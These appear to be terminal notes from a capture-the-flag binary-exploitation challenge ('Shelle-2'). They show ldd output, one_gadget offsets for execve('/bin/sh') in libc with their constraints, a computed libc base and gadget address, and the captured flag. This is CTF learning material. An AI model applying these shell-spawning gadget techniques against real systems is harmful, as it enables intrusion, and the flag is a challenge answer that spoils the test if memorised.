	linux-vdso.so.1 (0x00007ffd061db000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4510752000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f4510966000)


[letscode](11:49:00)-> one_gadget /lib/x86_64-linux-gnu/libc.so.6
0xe6c7e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6c81 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6c84 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
[letscode](11:49:44)-> 


libc_start_main = 0x7ffff7ddc0b3
onegadget_add   = 0x7ffff7e9bc81 


libc_base = 0x00007ffff7db5000
onegadget_off = 0xe6c81

0x00007ffff7db5000
0x00007f5c59b74000
0x00007fb537218000

Shelle-2
flag{60d5b41219778060c5f32746ee5926fd}